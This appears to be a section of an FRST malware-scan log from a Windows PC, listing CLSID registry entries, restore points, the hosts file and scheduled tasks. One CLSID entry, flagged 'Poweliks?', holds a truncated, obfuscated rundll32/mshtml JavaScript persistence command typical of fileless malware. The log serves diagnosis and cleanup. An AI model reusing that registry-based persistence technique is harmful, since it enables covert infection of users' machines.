CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{0DE2534F-A3C8-3E24-9749-687850CEB3A8}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{1060D0CD-5B56-3EEE-BB3A-AEC8472522B3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{1299B0C9-29A3-3940-AC1D-1FFC076798B1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{16746680-B251-396C-914A-0211B5CB7F23}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{16ADB401-64F5-3324-A88A-10AE369749FB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{16E320DC-C9FC-33E3-8B4D-7BF35CF3B7E3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{171A0B7B-6ADA-3C17-B15F-17B0B0E938A6}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{17608187-F734-32F0-9A46-71A10F592910}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{1B1C5E01-5354-36F7-8E8F-0F8AEE27E5E0}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{20FC2C0D-E606-3FB2-BD1A-A2A8E8E08AFC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{212D7A0C-C0C7-3F44-958D-E62CAD50DEB4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{231B15ED-A845-368D-B77C-C735413ADFA9}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{252EE0FB-BF08-30FB-84DF-BA863C6AFA09}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{2A6FC347-B37A-3B7A-8DA8-FA857F1446CC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{2ABCFF5F-70A5-3EAD-BA6A-CB8788133E18}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{2B8CDD04-8362-3A61-9B63-EC81420660C0}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{2DBA2186-EF21-3F3D-9CFB-5BF6DCF25033}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{2DF1F61C-F3E8-389B-8ED1-43CB730D4B1B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{30641C81-F598-3FDF-92F7-533A6BD583D8}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{363E6FFC-356F-336B-9603-D18DD89BB467}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{36F46B2D-E21B-3596-AC3A-4571C6AE860A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{383C94DE-A44C-3797-8D64-ACADF5674A26}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{387A1CD6-F50C-44FB-A7EA-F75D30D7A97F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{39E91280-1847-3A1C-8A47-5184F46E3A13}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{3B24BA91-8C3E-3EC4-B826-52D8C96728E2}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{3BAAAA84-78E2-398D-A121-8D99F410D18E}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{3EBFE219-45D6-35F9-8DDF-1541AD510CB5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{3F68BBEB-0B8B-3B24-BBFD-010BB3863E5A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{41B58D9B-1466-3534-B9CF-ABFBF0E01497}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{45694048-12CD-3955-B3A6-6421E838EF07}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4614FD5F-E173-32A3-A51C-FECE7F49EF63}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{47881152-4D8A-36E9-A24B-1CA70F59EE76}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{47BD9AAC-EEA1-3FC7-A018-773D50510A76}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{481DEACC-30B8-3F97-A977-1DDA68B0079A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{48D01E5B-8CFB-3C28-ADAC-76378A5988DA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4A66387D-0DDE-307C-A1AD-FC30A4C74E8A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4BB3F9DD-DE20-37E8-AE2A-B4DDE25B1028}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4BDE841C-BB63-3052-89E0-BD9CDED34C18}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4C1695C6-8CC6-33DE-9602-D08E362459E8}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4D6F1061-763F-3C80-AB08-32F04A3F838B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4D73F17A-8088-399E-B02D-2F2944110BDD}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{4F60C2CF-A617-31F9-A6B2-E35CB0DAE0E5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5321670B-8407-3998-86AA-228D78C128C7}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{55F27E2B-DE74-3EED-BD20-CBECE5A117E1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{57076BCB-E627-31C6-8EE9-30D3AB0895DF}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{587E0510-7EB8-3599-85BC-F4962BD1DFB5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{587F181A-5CEF-383C-9DC8-D9ABF5CEB1AC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5978A4C6-118E-3F57-A425-65E391B76C31}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5A7CD925-9137-3A3F-A543-DA436A3137AD}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5B330AAB-0460-31C6-9C85-22BF15EAC2CB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5B72D367-E84F-3E94-B304-31B028D87BEA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5BE1CBDA-7B78-3990-8E05-0377B29D49A7}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5D0CE54B-6079-318B-8EEB-20D249A84351}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5E076B60-76EB-3E07-8F69-82EE2642930A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{5FCEDC9E-9389-3A05-8455-3B225C51806F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{60AD41B4-6868-3EA3-8B57-A45930264327}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{61683280-8AC4-3981-BFBB-1004BCC37891}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{64AA1680-B0AD-3982-9F3A-924934552303}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{64F46A4A-9035-3B06-8DD6-87541CA8C3BA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{671C8C4D-93CC-38E2-BC04-24010E0337EE}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{67A2A120-A312-3212-BE67-CC7476D827CC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{691958C5-FE10-31D6-9874-980096EC8446}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{6E8A23DE-97C1-331D-A789-E1E4AE2C197E}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{700A43B3-EF3C-3B56-A247-591454BDAEBC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{720F6709-13E4-37CB-838B-7BA4FBAA63EB}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{733BCCDC-92E5-3751-95F4-F45184D8B2CC}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{769E7ECC-E57C-392D-BEB3-F25384BD8D25}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{7EDD8B4A-CB15-3DAC-AFFB-0BD4044CDDC1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{80E94B46-F2A1-3657-A246-D60FB6807135}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{822AA8AB-2123-4775-9AED-99D721F01F3F}\InprocServer32 -> C:\Users\scalac\AppData\Local\NEC\UC700 Outlook Calendar Link\adxloader.dll ()
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{8378A528-0596-3A5D-BF28-B7C56D54E252}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{8C93355E-631C-32DF-B144-06CAE92FBFBA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{92036FFB-8CFC-394D-B57C-062C39EB343B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{93C557D7-77E5-3A51-BAAB-36775F2DCEF4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{94F656C1-A93B-3407-93C5-11D9CF37A8A1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{980BAAE7-775C-3DC9-9C4A-03D86AC7A267}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{9C1BC9ED-7948-3058-AFE6-96156B017922}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{9CF1E5F4-3520-3488-8EDB-E56627329B15}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{9D39DA6C-6342-34DC-B1A1-C7B844CD71A4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{9E29DB84-9BF6-3F56-BE2C-609F0629E0C3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{A0CAE551-D8C3-3F13-86C3-D96DACEB90A7}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{A14EBAA2-383F-3C3E-88D3-AD908906F029}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{AA073870-297C-3996-B178-D92EBF4A820F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{AC7C43EC-860C-3F42-BC0D-8EF45F779604}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{B293E074-3911-36CD-B8B4-EF9FF0CE4F27}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{B4627868-756A-324D-A382-C8D5A0E84F34}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{B7326381-9491-3CA7-B151-C14B79EF5AAA}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{B7EB8647-DA5A-38EF-A998-F907D1F175E9}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{BA389EEB-555A-3EFA-9C9E-BCA78C2F00F5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{BBCD766F-F898-3AA9-B1C2-3EC8E03AF1FF}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{BC0DC794-79CE-3966-94CE-D10AD98D74CE}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{BDE21E90-7A2A-34A6-8056-565F29D87CC1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{C51B2538-0835-3874-9BFB-46FC58C2CEF0}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{C755FC48-C25A-39A3-9D17-DABA6A837C0B}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{C9408795-4789-3247-9878-5BBB2B260426}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{CB06F05C-5B82-322F-A104-A43AC8E6A507}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{CBA462B6-DFDE-3490-A03A-88A8159892E2}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{CE3F5A92-FB88-3DAC-8C4D-8BC47605B13E}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{D0C0115C-7387-318F-9CD0-CBA89258490C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{D23A02EC-3B94-3656-A0D7-4D20E021429D}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{D3763356-D8E2-3F2B-873A-45293FA1748C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{D65E651C-A186-3E1D-B2A2-729FF6E96E64}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{D9B65A9D-4D80-3DA8-AD8F-E6244BB3C4D8}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{DC533F21-FF77-3473-BF2C-0769F7A83D2A}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{DC8E1398-415F-34DE-81DC-89B74F824F26}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{E052CB22-822B-3381-87AF-4428A503F794}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{E1545F49-0A1C-332A-94B1-7010FEDBD131}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{E41DEB76-7F0D-3743-A878-CA509646CDF3}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{E60923A5-3485-38D5-A201-337AD6F28984}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{E63074A1-0765-3FAA-88F3-4FA40D41D5B5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{EA7FE6A2-35F7-3066-8B62-DB0AF7264BB5}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{EE25F13B-19A8-3646-95DC-D5010DA28F60}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{EE315693-6260-3D46-A33B-1D56734ADC31}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{EFF925C0-119E-375D-AA94-EFA14E4E30B1}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{F2EF6333-5EEB-4FA2-94A9-FB64BA72CE5A}\InprocServer32 -> C:\Users\scalac\AppData\Local\NEC\UC700 Office Smart Tag\adxloader.dll ()
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{F3B35FC5-F2B6-3554-9CA7-FC53A334D4EE}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{F59222E3-CEAB-3E88-BB20-86FDA1BD3B3D}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{F6F3E3D1-ADEE-38ED-ADAA-F06B3A89618C}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{F836AB74-CCE9-4A88-BC30-330952ED4DC1}\InprocServer32 -> C:\Users\scalac\AppData\Local\NEC\UC700 Office Smart Tag\adxloader.dll ()
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{F867AC2B-EB4C-3E31-8725-3A89EF955007}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{FB0696C8-987D-3007-A983-6BEAC40D45D4}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{FD6EE631-0989-3FBE-A27A-645937B384A9}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{FDA83E81-92AC-3E77-9FC5-B883CB075D2F}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-19809612-450918713-1538882281-38475_Classes\CLSID\{FF5549C1-1B1B-3F2B-BFE9-D458087A1F52}\InprocServer32 -> C:\Windows\system32\mscoree.dll (Microsoft Corporation)

==================== Restore Points  =========================

16-10-2014 16:05:00 Windows Update
16-10-2014 16:05:50 Windows Update
16-10-2014 16:06:56 Windows Update
16-10-2014 16:09:58 Windows Update
16-10-2014 16:11:43 Windows Update
16-10-2014 16:13:56 Windows Update
17-10-2014 12:03:25 Windows Update
17-10-2014 13:01:47 Windows Update
30-10-2014 12:45:31 Scheduled Checkpoint
31-10-2014 13:04:38 Malwarebytes Anti-Rootkit Restore Point

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:04 - 2014-10-23 12:41 - 00000027 ____N C:\Windows\system32\Drivers\etc\hosts
127.0.0.1       localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {69BB7B30-9B86-4AAC-A03B-1053B2CC164B} - System32\Tasks\Microsoft\Windows\Work Folders\Work Folders Maintenance Work => C:\Windows\system32\WorkFoldersSystemTray.exe [2014-04-08] (Microsoft Corporation)
Task: {805A0719-FE2D-4177-92C0-568EB845F69D} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-10-29] (Piriform Ltd)
Task: {B585DF04-F9C8-49A1-9251-BC55B61DCE43} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2014-10-23] (Adobe Systems Incorporated)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

